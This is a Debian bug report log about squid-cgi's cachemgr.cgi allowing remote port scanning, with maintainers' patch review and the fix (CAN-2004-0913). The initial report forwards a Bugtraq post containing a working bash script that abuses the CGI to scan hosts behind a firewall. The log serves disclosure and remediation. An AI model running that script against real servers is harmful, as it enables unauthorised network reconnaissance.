Debian Bug report logs - #133131
cachemgr.cgi allows remote users to scan arbitrary hosts and ports

Package: squid-cgi; Maintainer for squid-cgi is Luigi Gangitano <luigi@debian.org>; Source for squid-cgi is src:squid3.

Reported by: Matt Zimmerman <mdz@debian.org>

Date: Sat, 9 Feb 2002 20:18:01 UTC

Severity: important

Tags: patch, potato, security, woody

Done: Luigi Gangitano <luigi@debian.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, team@security.debian.org, Miquel van Smoorenburg <miquels@cistron.nl>, squid@packages.qa.debian.org:
Bug#133131; Package squid-cgi. Full text and rfc822 format available.

Acknowledgement sent to Matt Zimmerman <mdz@debian.org>:
New Bug report received and forwarded. Copy sent to team@security.debian.org, Miquel van Smoorenburg <miquels@cistron.nl>, squid@packages.qa.debian.org. Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Matt Zimmerman <mdz@debian.org>
To: submit@bugs.debian.org
Subject: cachemgr.cgi allows remote users to scan arbitrary hosts and ports
Date: Sat, 9 Feb 2002 15:14:12 -0500
Package: squid-cgi
Severity: important
Tags: sid woody potato security

Debian's cachemgr.cgi is installed and enabled by default, and publicly
accessible.  The version in sid displays a prominent warning message with
debconf, but this does little to correct the problem.  The potato version
only displays this note from postinst:

squid-cgi:   IMPORTANT: Read the documentation in
squid-cgi:   /usr/share/doc/squid-cgi/README.cachemgr.gz

which is easily missed.  cachemgr.cgi should be disabled or crippled by
default, so that the administrator must voluntarily open this hole, or set
up access control.  It looks like Red Hat worked around this issue
(RHSA-1999-025) by moving cachemgr.cgi out of cgi-bin so that the
administrator must work to enable it.  This is not as much of an issue in
the Debian squid package, as cachemgr.cgi is in a separate package, but this
should still be fixed.

A better way to do this for Debian might be to have cachemgr.cgi read a
simple configuration file in /etc.  It would contain a list of hosts and
ports that the cache manager would allow users to connect to, and could
default to localhost:3128.  This would allow the script to work with a local
Debian packaged squid by default, and provide a secure way to use it with
other caches without allowing arbitrary port scanning.

If this sounds good to you, I can provide a patch if that would help.

----- Forwarded message from Francisco S?a Mu?oz <fsaa@ip6seguridad.com> -----

Date: Mon, 4 Feb 2002 17:43:36 +0100
From: Francisco S?a Mu?oz <fsaa@ip6seguridad.com>
To: <bugtraq@securityfocus.com>
Subject: cachemgr.cgi (squid 2.3STABLE4)

]-* [IP6] Concept: Squid cachemgr.cgi misconfiguration

]-* [IP6] Configuration error [BID error class]

]-* [IP6] Platform investigated: 	Linux Redhat 6.2
						Squid 2.3STABLE4
						Apache 1.3.12

]-* [IP6] The problem...

Due to a misconfiguration on Apache and Squid Is posible to use
cachemgr.cgi shipped with Squid to scan hosts under the corporate firewall.

...also we can gater a lot information about the navegation,
configuration...

...also there is a lot code with bad programmer habits!

There is a lil' script to demonstrate the error, not so clean, but useful.

--- Begin nasty code miscachemgr.cgi ---
#!/bin/bash -x

# Port scanning using a misconfigured squid
# using open apache

# Usage miscachemgr host_vuln host_to_scan end_port

# Concept: Jacobo Van Leeuwen & Francisco S?a Mu?oz
# Coded by Francisco S?a Mu?oz
# IP6 [Logic Control]

PORT=1
ONE='/cgi-bin/cachemgr.cgi?host='
TWO='&port='
THREE='&user_name=&operation&auth='

mkdir from_$1_to_$2

while [ $PORT -lt $3 ]; do

# lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\
# $2&port=$PORT&user_name=&operation=authenticate&auth= > \
# port_$1_to_$2/$PORT.log 2>&1

lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1
let PORT=PORT+1

done
--- End nasty Code ---

]-* [IP6] Solution

Deny access, configure it!

]-* [IP6] Thanks

Thanks to all IP6 staff for the good feeling.

Signed,

--
Francisco S?a Mu?oz :: Nuno Treez \(HLP\)
Security Consultant/Tiger Team
IP6 Seguridad http://www.ip6seguridad.com
--
Linux User #119288
Proud mame.dk user #115087
--
"What if I'm not elite? Ragna Gronvold says I'm special" (yes, it's from
rfp)
--

]-* [IP6] EOF

----- End forwarded message -----
----- Forwarded message from Francisco S?a Mu?oz <fsaa@ip6seguridad.com> -----

Date: Wed, 6 Feb 2002 10:26:23 +0100
From: Francisco S?a Mu?oz <fsaa@ip6seguridad.com>
To: <bugtraq@securityfocus.com>
Subject: cachemgr.cgi (2.3STABLE4) (and 2)

Stuart Moore from SecurityTracker tells me:

http://www.redhat.com/support/errata/RHSA-1999-025.html

Yes, is the same thing. The only new thing that I have contributed to
is the script to demonstrate the vulnerability. (blah...)

Signed,

--
Francisco S?a Mu?oz :: Nuno Treez \(HLP\)
Security Consultant/Tiger Team
IP6 Seguridad http://www.ip6seguridad.com
--
Linux User #119288
Proud mame.dk user #115087
--
"What if I'm not elite? Ragna Gronvold says I'm special"
--

ps: mi english is poor, I know!

----- End forwarded message -----

-- 
 - mdz



Severity set to `grave'. Request was from Adrian Bunk <bunk@fs.tum.de> to control@bugs.debian.org. Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#133131; Package squid-cgi. Full text and rfc822 format available.

Acknowledgement sent to Luigi Gangitano <luigi@debian.org>:
Extra info received and forwarded to list. Full text and rfc822 format available.

Message #12 received at 133131@bugs.debian.org (full text, mbox):

From: Luigi Gangitano <luigi@debian.org>
To: Matt Zimmerman <mdz@debian.org>
Cc: 133131@bugs.debian.org, Adrian Bunk <bunk@fs.tum.de>
Subject: Bug #133131: squid-cgi: cachemgr.cgi allows remote users to scan arbitrary
Date: Fri, 24 Sep 2004 01:20:28 +0200
[Message part 1 (text/plain, inline)]
Hi Matt,
Adrian correctly changed severity for this bug to grave. I want to
resolve this issue and get it to sarge (and maybe to woody-proposed-
updates).

I have to options:
- Provide /etc/apache/conf.d/squid-cgi.conf with localhost access only
to squidmgr.cgi

- Patch squidmgr.c to check for a configuration file limiting hosts
scanned as you suggested in your original report, proposing a patch.
This should also get to upstream, so future version won't be affected.

What would you suggest? And, if you find the second one more
appropriate, could you provide the patch you offered?

Thanks,

-- 
 Luigi Gangitano -- <luigi@debian.org> -- <gangitano@lugroma3.org>
 GPG: 1024D/924C0C26: 12F8 9C03 89D3 DB4A 9972  C24A F19B A618 924C 0C26
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Luigi Gangitano <luigi@debian.org>:
Bug#133131; Package squid-cgi. Full text and rfc822 format available.

Acknowledgement sent to Matt Zimmerman <mdz@debian.org>:
Extra info received and forwarded to list. Copy sent to Luigi Gangitano <luigi@debian.org>. Full text and rfc822 format available.

Message #17 received at 133131@bugs.debian.org (full text, mbox):

From: Matt Zimmerman <mdz@debian.org>
To: Luigi Gangitano <luigi@debian.org>, 133131@bugs.debian.org
Subject: Re: Bug#133131: Bug #133131: squid-cgi: cachemgr.cgi allows remote users to scan arbitrary
Date: Thu, 23 Sep 2004 16:58:12 -0700
On Fri, Sep 24, 2004 at 01:20:28AM +0200, Luigi Gangitano wrote:

> Adrian correctly changed severity for this bug to grave. I want to
> resolve this issue and get it to sarge (and maybe to woody-proposed-
> updates).
> 
> I have to options:
> - Provide /etc/apache/conf.d/squid-cgi.conf with localhost access only
> to squidmgr.cgi
> 
> - Patch squidmgr.c to check for a configuration file limiting hosts
> scanned as you suggested in your original report, proposing a patch.
> This should also get to upstream, so future version won't be affected.
> 
> What would you suggest? And, if you find the second one more
> appropriate, could you provide the patch you offered?

The CGI is useful with any web server, right?  If so, the
non-Apache-specific solution is probably better.  Unfortunately, I am
incredibly busy with work right now and cannot provide a patch for you.

-- 
 - mdz



Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#133131; Package squid-cgi. Full text and rfc822 format available.

Acknowledgement sent to Luigi Gangitano <luigi@debian.org>:
Extra info received and forwarded to list. Full text and rfc822 format available.

Message #22 received at 133131@bugs.debian.org (full text, mbox):

From: Luigi Gangitano <luigi@debian.org>
To: Matt Zimmerman <mdz@debian.org>, 133131@bugs.debian.org
Cc: Adrian Bunk <bunk@fs.tum.de>, control@bugs.debian.org
Subject: Re: Bug#133131: squid-cgi: cachemgr.cgi allows remote users to scan arbitrary
Date: Sun, 03 Oct 2004 14:24:22 +0200
[Message part 1 (text/plain, inline)]
tags 133131 patch
thanks

Hi,
I've developed a small patch that adds a configuration
(/etc/squid/cachemgr.conf) file which contains allowed targets in this
form:

hostname:port

Can you please review it? If it's ok I will include it and push squid to
sarge.

Thanks,

-- 
 Luigi Gangitano -- <luigi@debian.org> -- <gangitano@lugroma3.org>
 GPG: 1024D/924C0C26: 12F8 9C03 89D3 DB4A 9972  C24A F19B A618 924C 0C26
[cachemgr.diff (text/x-patch, attachment)]
[signature.asc (application/pgp-signature, inline)]

Tags added: patch Request was from Luigi Gangitano <luigi@debian.org> to control@bugs.debian.org. Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#133131; Package squid-cgi. Full text and rfc822 format available.

Acknowledgement sent to Luigi Gangitano <luigi@debian.org>:
Extra info received and forwarded to list. Full text and rfc822 format available.

Message #29 received at 133131@bugs.debian.org (full text, mbox):

From: Luigi Gangitano <luigi@debian.org>
To: Matt Zimmerman <mdz@debian.org>, 133131@bugs.debian.org
Cc: control@bugs.debian.org
Subject: Re: Bug#133131: Bug #133131: squid-cgi: cachemgr.cgi allows remote users to scan arbitrary
Date: Wed, 06 Oct 2004 20:44:42 +0200
[Message part 1 (text/plain, inline)]
tags 133131 - sid
severity 133131 important
thanks

I fixed this bug in squid_2.5.6-9. Still opened for woody and potato. 

Lowering severity to allow the fix in sarge.

Rationale: bug is fixed in sid, so not RC anymore, but still important
for woody.

-- 
 Luigi Gangitano -- <luigi@debian.org> -- <gangitano@lugroma3.org>
 GPG: 1024D/924C0C26: 12F8 9C03 89D3 DB4A 9972  C24A F19B A618 924C 0C26
[signature.asc (application/pgp-signature, inline)]

Tags removed: sid Request was from Luigi Gangitano <luigi@debian.org> to control@bugs.debian.org. Full text and rfc822 format available.

Severity set to `important'. Request was from Luigi Gangitano <luigi@debian.org> to control@bugs.debian.org. Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Luigi Gangitano <luigi@debian.org>:
Bug#133131; Package squid-cgi. Full text and rfc822 format available.

Acknowledgement sent to Martin Schulze <joey@infodrom.org>:
Extra info received and forwarded to list. Copy sent to Luigi Gangitano <luigi@debian.org>. Full text and rfc822 format available.

Message #38 received at 133131@bugs.debian.org (full text, mbox):

From: Martin Schulze <joey@infodrom.org>
To: Luigi Gangitano <luigi@debian.org>
Cc: Debian Security Team <team@security.debian.org>, 133131@bugs.debian.org
Subject: Re: Bug #133131, fix for woody
Date: Thu, 7 Oct 2004 10:17:46 +0200
Luigi Gangitano wrote:
> Hi all,
> I'm in the process of uploading a new version of squid that fixes this
> security bug with the attached diff for sid and sarge. I would like to
> fix woody too. Since there's no difference in source code, the same
> patch should apply.

Good.

> I don't know if an advisory is needed, but I'd like to add it to the
> next stable revision.

I guess, an advisory is needed.  I assign CAN-2004-0913 to this
vulnerability.  Please mention it in the changelog.

> --- cachemgr.c.orig	2004-10-01 23:48:34.000000000 +0200
> +++ cachemgr.c	2004-10-02 01:48:34.000000000 +0200
> @@ -160,4 +160,5 @@
>  static time_t now;
>  static struct in_addr no_addr;
> +static const char *configfile = "/etc/squid/cachemgr.conf";
>  
>  /*
> @@ -181,4 +182,7 @@
>  static const char *make_auth_header(const cachemgr_request * req);
>  
> +static int check_target_acl(const char *hostname, int port);
> +
>  
>  static const char *
> @@ -535,4 +539,9 @@
>  	return 0;
>      }
> +	if ((check_target_acl(req->hostname, req->port)) > 0) {
> +	snprintf(buf, 1024, "acl: target not allowed\n");
> +	error_html(buf);
> +	return 1;
> +	}
>      if ((s = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
>  	snprintf(buf, 1024, "socket: %s\n", xstrerror());
> @@ -752,2 +761,42 @@
>      return buf;
>  }
> +
> +static int 
> +check_target_acl(const char *hostname, int port)
> +{
> +    char config_line[BUFSIZ];
> +	char *token = NULL;
> +	int i;
> +    FILE *fp = NULL;
> +	if ((fp = fopen(configfile, "r")) == NULL) {
> +		if ((strcmp(hostname, CACHEMGR_HOSTNAME) != 0) || port != CACHE_HTTP_PORT)

I'd rather phrase this the other way round, so the logic behind it is
more obvious:

       		if ((strcmp(hostname, CACHEMGR_HOSTNAME) == 0) && port == CACHE_HTTP_PORT)
			return 0;
		else
			return 1;

When the last return statement is moved down (see below), the else
part can be left out.

> +	} else {
> +		while (fgets(config_line, BUFSIZ, fp)) {
> +    		if ((token = strchr(config_line, '\n')))
> +        		*token = '\0';
> +    		if (config_line[0] == '#')
> +        		continue;
> +    		if (config_line[0] == '\0')
> +        		continue;

Wrong indention above (after the while loop).

> +			if ((token = strtok(config_line, ":")) == NULL)
> +				continue;
> +			if (strcmp(token, hostname) != 0) {
> +				continue;
> +			} else {
> +				if ((token = strtok(NULL, ":")) == NULL)
> +					continue;
> +				if (sscanf(token, "%d", &i) != 1)
> +					continue;
> +				if (i != port)
> +					continue;
> +				else
> +					return 0;

I'd turn this around as well to make the logic behind it more obvious:

   				if (i == port)
   					return 0;
   				else
   					continue;

That way you can also leave out the else part, btw., which I would do
as well.

> +			}
> +		}	
> +		return 1;	
> +	}
> +	
> +}

I'd move that "return 1" one block below, so it's the end of the
function.  From the current data path this doesn't matter, but for
future extensions or reviews it may be more obvious.

In general the solution looks good.

Have you spoke with upstream yet?  What do they think?  It would be
bad if Debian would invent a solution and upstream would implement
another solution, so that Debian packages would be converted.

We also need an empty (and registered) conffile that contains
something like:

	# cachemgr.conf - Configuration of the squid cachemgr.cgi
	#
	# Simply place pairs of hostnames and ports that the cachemgr
	# should be permitted to connect to in lines of their own.
	#
	# foo.bar.org:3128


Regards,

	Joey

PS: Did you receive my mail wrt. CAN-2004-0832?

-- 
It's time to close the windows.

Please always Cc to me when replying to me on the lists.



Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#133131; Package squid-cgi. Full text and rfc822 format available.

Acknowledgement sent to Luigi Gangitano <luigi@debian.org>:
Extra info received and forwarded to list. Full text and rfc822 format available.

Message #43 received at 133131@bugs.debian.org (full text, mbox):

From: Luigi Gangitano <luigi@debian.org>
To: Martin Schulze <joey@infodrom.org>, 133131@bugs.debian.org
Cc: Debian Security Team <team@security.debian.org>
Subject: Re: Bug#133131: Bug #133131, fix for woody
Date: Thu, 07 Oct 2004 19:07:43 +0200
[Message part 1 (text/plain, inline)]
Il giorno gio, 07-10-2004 alle 10:17 +0200, Martin Schulze ha scritto:
> I guess, an advisory is needed.  I assign CAN-2004-0913 to this
> vulnerability.  Please mention it in the changelog.

Done. Let me know if you want a woody package with that fix.

> In general the solution looks good.

Thanks, I've just applied your suggestions.

> Have you spoke with upstream yet?  What do they think?  It would be
> bad if Debian would invent a solution and upstream would implement
> another solution, so that Debian packages would be converted.

The suggested that solution. I sent back the patch for review but
received no answer. I'm going to upload a whishlist bug to upstream
bugzilla with the patch.

> We also need an empty (and registered) conffile that contains
> something like:
> 
> 	# cachemgr.conf - Configuration of the squid cachemgr.cgi
> 	#
> 	# Simply place pairs of hostnames and ports that the cachemgr
> 	# should be permitted to connect to in lines of their own.
> 	#
> 	# foo.bar.org:3128

Already done. I just allowed localhost:3128 which is default in
squid.conf.


> PS: Did you receive my mail wrt. CAN-2004-0832?

I did and added it to the changelog.

Thanks,

-- 
 Luigi Gangitano -- <luigi@debian.org> -- <gangitano@lugroma3.org>
 GPG: 1024D/924C0C26: 12F8 9C03 89D3 DB4A 9972  C24A F19B A618 924C 0C26

[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Luigi Gangitano <luigi@debian.org>:
Bug#133131; Package squid-cgi. Full text and rfc822 format available.

Acknowledgement sent to Martin Schulze <joey@infodrom.org>:
Extra info received and forwarded to list. Copy sent to Luigi Gangitano <luigi@debian.org>. Full text and rfc822 format available.

Message #48 received at 133131@bugs.debian.org (full text, mbox):

From: Martin Schulze <joey@infodrom.org>
To: Luigi Gangitano <luigi@debian.org>
Cc: 133131@bugs.debian.org, Debian Security Team <team@security.debian.org>
Subject: Re: Bug#133131: Bug #133131, fix for woody
Date: Thu, 7 Oct 2004 19:20:58 +0200
Luigi Gangitano wrote:
> Il giorno gio, 07-10-2004 alle 10:17 +0200, Martin Schulze ha scritto:
> > I guess, an advisory is needed.  I assign CAN-2004-0913 to this
> > vulnerability.  Please mention it in the changelog.
> 
> Done. Let me know if you want a woody package with that fix.

I'd be glad to receive a new source package.  Please set the distribution
to 'stable-security' and the priority to 'high'.  Otherwise, the updated
patch would be fine as well, then I'll build the source package.

> > Have you spoke with upstream yet?  What do they think?  It would be
> > bad if Debian would invent a solution and upstream would implement
> > another solution, so that Debian packages would be converted.
> 
> The suggested that solution. I sent back the patch for review but
> received no answer. I'm going to upload a whishlist bug to upstream
> bugzilla with the patch.

Good, so that solution won't be nullified with the next upstream
release.

Regards,

	Joey

-- 
It's time to close the windows.

Please always Cc to me when replying to me on the lists.



Reply sent to Luigi Gangitano <luigi@debian.org>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Matt Zimmerman <mdz@debian.org>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #53 received at 133131-done@bugs.debian.org (full text, mbox):

From: Luigi Gangitano <luigi@debian.org>
To: 133131-done@bugs.debian.org
Subject: Closing Bug #133131: cachemgr.cgi allows remote users to scan arbitrary hosts and ports
Date: Sat, 30 Oct 2004 20:00:59 +0200
[Message part 1 (text/plain, inline)]
This bug has been fixed in 2.5.6-10 for sarge/sid and in 2.4.6-2woody4
for woody (see DSA 576-1).

Regards,

-- 
 Luigi Gangitano -- <luigi@debian.org> -- <gangitano@lugroma3.org>
 GPG: 1024D/924C0C26: 12F8 9C03 89D3 DB4A 9972  C24A F19B A618 924C 0C26
[signature.asc (application/pgp-signature, inline)]

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Sat Apr 19 23:58:47 2014; Machine Name: buxtehude.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.